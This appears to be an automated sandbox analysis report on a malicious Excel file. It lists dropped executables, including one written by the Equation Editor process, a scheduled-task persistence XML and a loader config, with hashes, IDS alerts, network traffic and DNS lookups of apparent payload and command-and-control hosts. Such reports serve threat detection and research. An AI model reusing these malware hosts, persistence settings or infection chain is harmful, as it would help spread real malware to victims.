SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC79CE56.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6413430594685933
Encrypted:	false
SSDEEP:
MD5:	C222CCD1034332B55B2897F143B03581
SHA1:	FE8FC79E1DE315C4371B5872CDABD5338A2AD5C6
SHA-256:	595356BB0D0F0B98BF0D8E41FA5CF1D7EE900F392BC4B3DE0106281357E4A750
SHA-512:	14EA11438D2BBD614A89FCE1E6271198B21A54609D9AE85750B4A2370962D9721ABF82E6AEAC1AA8DF02E52E49EBAC05769CD3EEC9B2D9D1974CD4BD20850E5D
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$........f.[.@..%...t...................RQ.\....................$Q.\........ ...Id.[........ .........<..d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......H....8.[......<.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\RegSvcs.exe Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45216
Entropy (8bit):	6.136703067968073
Encrypted:	false
SSDEEP:
MD5:	62CE5EF995FD63A1847A196C2E8B267B
SHA1:	114706D7E56E91685042430F783AE227866AA77F
SHA-256:	89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
SHA-512:	ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
Malicious:	false
Joe Sandbox View:	Filename: PI.xlsx, Detection: malicious, Browse Filename: swift.xls, Detection: malicious, Browse Filename: PENDING INVOICES.doc, Detection: malicious, Browse Filename: RFQ-2201847.xlsx, Detection: malicious, Browse Filename: Postal Financial Services.doc, Detection: malicious, Browse Filename: 85a3f6aa_by_Libranalysis.rtf, Detection: malicious, Browse Filename: Files Specification.xlsx, Detection: malicious, Browse Filename: Update of the OFFICE PACK.xlam, Detection: malicious, Browse Filename: Quotation Assurance.doc, Detection: malicious, Browse Filename: Update of the OFFICE PACK.doc, Detection: malicious, Browse Filename: DHL Documents 7.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t........0..(....... ....s#........o$....X..(....-...o%....0...........(&......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Local\Temp\tmp7677.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.10308114203322
Encrypted:	false
SSDEEP:
MD5:	8ECDD2338BF1DCD4DDA0C0FB1AA7216B
SHA1:	BA3A56765CF577D12CFDCEC6D1BA79A1425AC65A
SHA-256:	E68557FA69E3E09BC76444A92B98313C8BFEA14AB42E581CF4129117702386DC
SHA-512:	7499BD382CC2E3A63C9938EFA8CFE70461F3248AE185D7D8F3300F4490CDEB2823CF2C168FEB4E0C4CC6803FD8F995D2A24D433DDF61611EF7240E58507CD637
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:
MD5:	026FE3A73F30ED51820D936A03AF9C95
SHA1:	62D292056CF26A58D860D75F4C2A98BC4F91EF64
SHA-256:	AA1E1FDACFC0C58F21BF51B6F1E54A8B827DC31F6B4F2EDFFEAEFD45E7DE8583
SHA-512:	42481B60ACB436A601DBE111A2E69F9F152793C45314BB64D6B7749072F5BB52DB863323C260A30090FD3CF18EFDE95D27A695D98BA7F9C3EB0C861E7A256651
Malicious:	true
Reputation:	unknown
Preview:	..y.j..H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.366759974483214
Encrypted:	false
SSDEEP:
MD5:	274639AEBFFC3A903D57150C8E7E3D80
SHA1:	A5B43DB77933BAC72A1E991DA56128136C776C30
SHA-256:	C5E8989F5CE86EB4B4058D058C4F4ADB2D360BB55E2D4152397CF772B1D02E1C
SHA-512:	18710EDCA8D608ED7F04D108B091924FFFE61C327BC827C53C1C74411FE9531A093AA93B908F5E9A78E8D2355B85EAE2F9B9E79CAE75E90F755040CFFD8437F0
Malicious:	false
Reputation:	unknown
Preview:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe

C:\Users\user\Desktop\~$Import order764536.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Reputation:	unknown
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\temp\qhqulleu.mp3 Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.071141961542051
Encrypted:	false
SSDEEP:
MD5:	E241BA8C7BF12A7128E7C0AD28348930
SHA1:	ACFC821D16BAB7535369917F41BB21ADA15E3BC0
SHA-256:	0B64183C8B6E30C78D7EB1997E3686A1CE832B3CB0092F09CA76BA5FD5EE0B9C
SHA-512:	26A78974A6794751B052B58EB01C3BF9030E1116050C24A86326E31F1F11E1289860AC915F055B13F29AF3D0BED1E73CE9C5EAFC1196DD1C9CACA9C2E5602376
Malicious:	false
Reputation:	unknown
Preview:	[S3tt!ng]..stpth=%userprofile%..Key=Windows element..Dir3ctory=33920049..ExE_c=mmuiqlcvwo.pif..

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1073384
Entropy (8bit):	7.832162830296474
Encrypted:	false
SSDEEP:
MD5:	B866823E1F8F4A52376BD108C457DD78
SHA1:	FE99849EC27630463080445337798EEBA8000A02
SHA-256:	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8
SHA-512:	FD1732CA7DC310395581D835EA3DF1E7AD664C75C9C7F68BA55C0B2E521383A0C8781B490F7CC05428D6E534B356A585BF11B57E57808CC37EA08DABF4A09E13
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}\|^.....................(............... ....@.......................................@.........................@...4...t...<.... ..(L...................p...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...(L... ...N..................@..@.reloc...!...p..."..................@..B........................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.972494138604762
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Import order764536.xlsx
File size:	329288
MD5:	cf9700bcf6687a0f9bc3b205b43b40ba
SHA1:	1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256:	61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
SHA512:	ebd879d95685dd3f2fc02b2dccfdbadedb51dadc26abc90180cbbcd89a81ce666e4b674f3d852b79399f877659966b6d3a5f8e1d50d556edba3ed15baff70ab4
SSDEEP:	6144:oFdtTEkYk4nzohTixTbXW4cRk8zHlcEbGQsIJTz81LKD7barZBS:oFdtxYk4eTgSDJHPDs+/8RUbalY
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-09:59:47.354702	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50591	8.8.8.8	192.168.2.22
10/13/21-09:59:47.374175	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50591	8.8.8.8	192.168.2.22
10/13/21-09:59:52.887907	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57805	8.8.8.8	192.168.2.22
10/13/21-10:00:24.135767	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55616	8.8.8.8	192.168.2.22
10/13/21-10:00:50.093736	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.207655	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.323593	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.342456	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.361337	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:01:00.854656	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22
10/13/21-10:01:00.880428	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22
10/13/21-10:01:00.994245	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 09:59:21.317526102 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.414338112 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.414518118 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.414997101 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.514235973 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.515645027 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.516555071 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.534657955 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.534708023 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.536199093 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.548351049 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.548379898 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.758630991 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.758790970 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.775974989 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.776025057 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.776443005 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.776597977 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.042098045 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.087136984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.139942884 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140019894 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140053034 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.140070915 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140131950 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.140136957 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237624884 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.237749100 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237860918 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.237927914 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237966061 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.238042116 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.238084078 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334064007 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334162951 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334321022 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334341049 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334403992 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334486961 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337006092 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337120056 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337121964 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337136984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337193966 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337218046 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337290049 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337315083 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337400913 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337485075 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337496042 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337527037 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337544918 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.340106964 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431241989 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431370974 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431541920 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431570053 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431639910 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431921005 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.434273005 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.434384108 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.434587002 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435487032 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435558081 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435594082 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435645103 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435671091 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435729980 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435760975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435808897 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435890913 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435936928 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435978889 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436028004 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436064959 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436114073 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436146975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436198950 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436234951 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436284065 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436317921 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436369896 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.439570904 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.528394938 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.528692007 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.531434059 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.531594038 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533046007 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533185005 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533207893 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533441067 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533489943 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533497095 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533502102 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533508062 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533524036 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533560038 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533653975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.533720970 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.533781052 CEST	443	49166	97.107.138.110	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 09:59:21.185333967 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:21.293992043 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:47.240828991 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:47.354701996 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:47.355910063 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:47.374175072 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:52.772918940 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:52.887907028 CEST	53	57805	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:58.129411936 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:58.147654057 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 13, 2021 09:59:58.148163080 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 09:59:58.166407108 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:18.795478106 CEST	59185	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:18.814081907 CEST	53	59185	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:24.019435883 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:24.135766983 CEST	53	55616	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:24.136451960 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:24.155626059 CEST	53	55616	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:29.338015079 CEST	49972	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:29.356427908 CEST	53	49972	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:49.979460001 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.093735933 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.094465017 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.207654953 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.208348036 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.323592901 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.324213982 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.342456102 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:50.343091965 CEST	51771	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:50.361336946 CEST	53	51771	8.8.8.8	192.168.2.22
Oct 13, 2021 10:00:55.547637939 CEST	59867	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:00:55.566097975 CEST	53	59867	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.741380930 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.854655981 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.862250090 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.880428076 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.880924940 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:00.994245052 CEST	53	50315	8.8.8.8	192.168.2.22
Oct 13, 2021 10:01:00.994884014 CEST	50315	53	192.168.2.22	8.8.8.8
Oct 13, 2021 10:01:01.012785912 CEST	53	50315	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 09:59:21.185333967 CEST	192.168.2.22	8.8.8.8	0x19fc	Standard query (0)	demopicking.renova-sa.net	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.240828991 CEST	192.168.2.22	8.8.8.8	0x6e3a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.355910063 CEST	192.168.2.22	8.8.8.8	0x6e3a	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:52.772918940 CEST	192.168.2.22	8.8.8.8	0x5435	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.129411936 CEST	192.168.2.22	8.8.8.8	0xfefa	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.148163080 CEST	192.168.2.22	8.8.8.8	0xfefa	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
